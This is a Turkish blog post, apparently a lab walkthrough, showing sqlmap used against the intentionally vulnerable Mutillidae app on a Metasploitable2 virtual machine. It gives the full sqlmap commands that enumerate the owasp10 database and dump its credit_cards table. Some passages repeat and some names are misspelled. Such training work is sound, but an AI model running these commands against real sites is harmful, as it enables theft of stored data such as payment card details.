Metasploitable2 İşletim Sisteminden SQLMAP Araçı ile Veri Tabanına Ulaşmak
Bu yazımda,SQLMAP aracını kullanarak sanal makine olarak kurduğum Metasploitable2 işletim sistemi içerisinde olan Mutillidae platformunda SQL açıklarını,veri tabanı açıklarını tarayıp sızma işlemleri gerçekleştirdim.Keyifli okumalar dilerim :)
Öncellikle Mutillidae nedir onu ele alalım,
Mutillidae: Adrian “Irongeek” Crenshaw ve Jeremy “webpwnized” Druin tarafından geliştirilen web uygulamaları penetrasyon testleri ve hackleme amaçlı ücretsiz kaynak kodlu yazılımıdır.Clickjacking, SQLi, Xss, HTML Injection, Javascript Injection saldırıları gibi gibi pratikler yapabileceğiniz savunmasız bir ortam tasarlanmıştır.
Görüldüğü üzere yanlış giriş yaptık ve hatamızı aldık. Bu alanda açık varmı onu denemek için url kopyalıyalım.
Kopyaladığım Url’yi SQLMAP sorgusundan geçiyorum ve taramayı bekliyoruz.
SQLMAP bize username açığını bulduğunu söylüyor devam edeyim mi diye sorduğundan hayır diyip bu açıktan sızmayı deniyeceğiz.
Resimdeki kodu kullanarak veritabanlarının isimlerini öğrenebiliriz.
Tek tek SQL kodları ile veritabanlarının isimlerini öğrenmek yerine SQLMAP aracı bize veritabanlarının isimlerini otomatik hiç bir sql kodu yazmadan verebildiğini öğrendim.
Terminale
sqlmap -u "http://192.168.148.132/mutillidae/index.php?page=user-info.php&username=mazlum&password=123456&user-info-php-submit-button=View+Account+Details" –current-db
kodunu yazıp güncel veri tabanın ismini öğrenebiliriz.
Kodun cıktısı olarak veritabanın son güncel isminin owasp10 olduğunu öğrendik.
Bu kodu terminale yazarkta da owaps10 deki tüm tabloları bulabiliriz.
owaps10 veritabanın da toplam 6 tablo olduğu sonucuna ulastık.
Bir diğer kod ise kredi kartı tablosundaki tüm sütünları çekmeye yarar.
Toplamda 4 sütün buldu şimdi bu sütundaki tüm bilgileri çekmek için,
Görüldüğü üzere tablo adı:credit_cart olan sütünları ccid,ccv,ccnumber,expiration sütünlarındaki tüm bilgileri otomatik olarak çektik.
Kodun cıktısı olarak veritabanın son güncel isminin owasp10 olduğunu öğrendik.
Bu kodu terminale yazarkta da owaps10 deki tüm tabloları bulabiliriz.
sqlmap –u "http://192.168.148.132/mutillidae/index.php?page=user-info.php&username=mazlum&password=123456&user-info-php-submit-button=View+Account+Details" --tables -D owasp10
owaps10 veritabanın da toplam 6 tablo olduğu sonucuna ulastık.
Bir diğer kod ise kredi kartı tablosundaki tüm sütünları çekmeye yarar.
sqlmap -u "http://192.168.148.132/mutillidae/index.php?page=user-info.php&username=mazlum&password=123456&user-info-php-submit-button=View+Account+Details" --columns -T credit_cards -D owasp10
Toplamda 4 sütün buldu şimdi bu sütundaki tüm bilgileri çekmek için,
sqlmap -u "http://192.168.148.132/mutillidae/index.php?page=user-info.php&username=mazlum&password=123456&user-info-php-submit-button=View+Account+Details" -T credit_cards -D owasp10 –dumpbu kodu kullanıyoruz.
Görüldüğü üzere tablo adı:credit_cart olan sütünları ccid,ccv,ccnumber,expiration sütünlarındaki tüm bilgileri otomatik olarak çektik.
0 Yorumlar